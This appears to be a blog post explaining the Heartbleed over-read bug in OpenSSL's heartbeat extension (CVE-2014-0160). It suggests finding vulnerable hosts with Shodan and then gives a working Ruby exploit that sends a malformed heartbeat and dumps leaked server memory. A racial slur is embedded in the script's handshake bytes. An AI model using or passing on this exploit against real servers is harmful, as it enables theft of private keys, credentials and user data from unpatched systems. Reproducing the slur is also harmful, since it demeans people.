Heartbeat is an extension of the OpenSSL library.
The OpenSSL library is an open source project for implementing Transport Layer Security and Secure Sockets Layer (SSL/TLS) in addition to DTLS.
The Heartbeat extension was introduced to check if the TLS connection is still available.
It's a very simple mechanism: the client sends a special message called a heartbeat message to the server.
This message contains data and specifies its size.
In response, the server should send the same heartbeat request with the same data and data size.
This mechanism was proposed in RFC 6520.
However, the developers made a mistake and did not introduce a check whether the size of the data specified in the Heartbeat message represents the actual amount of data.
Turns out that in the original Heartbeat implementation, the client could declare any data size and the server would consider it valid.
The appears weakened if the declared size exceeds the actual size of the data.
In that case, the server returns the message with additional information:
[->] Customer request: 1 byte of real data, declared size: 200 bytes.
[<-] Server response: 200 bytes of data (1 original byte + 199 bytes from adjacent memory), size: 200 bytes.
A more accurated description about this buffer over-read vulnerability can be found here
After so many years there are people who still use old versions of OpenSSL!
Vulnerable versions go from 1.0.1 and 1.0.1a trough 1.0.1f
Knowing this, a simple shodan search can allow us to find thousands of vulnerable hosts.
Here's the ruby exploit code
require 'socket'
puts """
CVE-2014-0160
OpenSSL 'Heartbleed' buffer over-read exploit
By Komodo\n
"""
def main(address)
hello = "\x16\x03\x02\x004\x01\x00\x000\x03\x02a]\x9a\xcbITLOOKSLIKEAGLOWING"+
"CIANIGGER\x00\x00\x02\x00/\x01\x00\x00\x05\xff\x01\x00\x01\x00"
payload = "\x18\x03\x02\x00\x03\x01\xff\xff"
print "Port (press enter for default 443): "
port = gets.chomp
s = TCPSocket.new(address,port.empty??443:port.to_i)
s.sendmsg(hello)
s.recv(8192)
s.sendmsg(payload)
return "\n#{address} Memory dump:\n\n#{s.recv(65536)}\n"
end
begin
print "Address/domain: "
puts(main(gets.chomp))
rescue => e
abort("\nError: #{e}\n\n")
end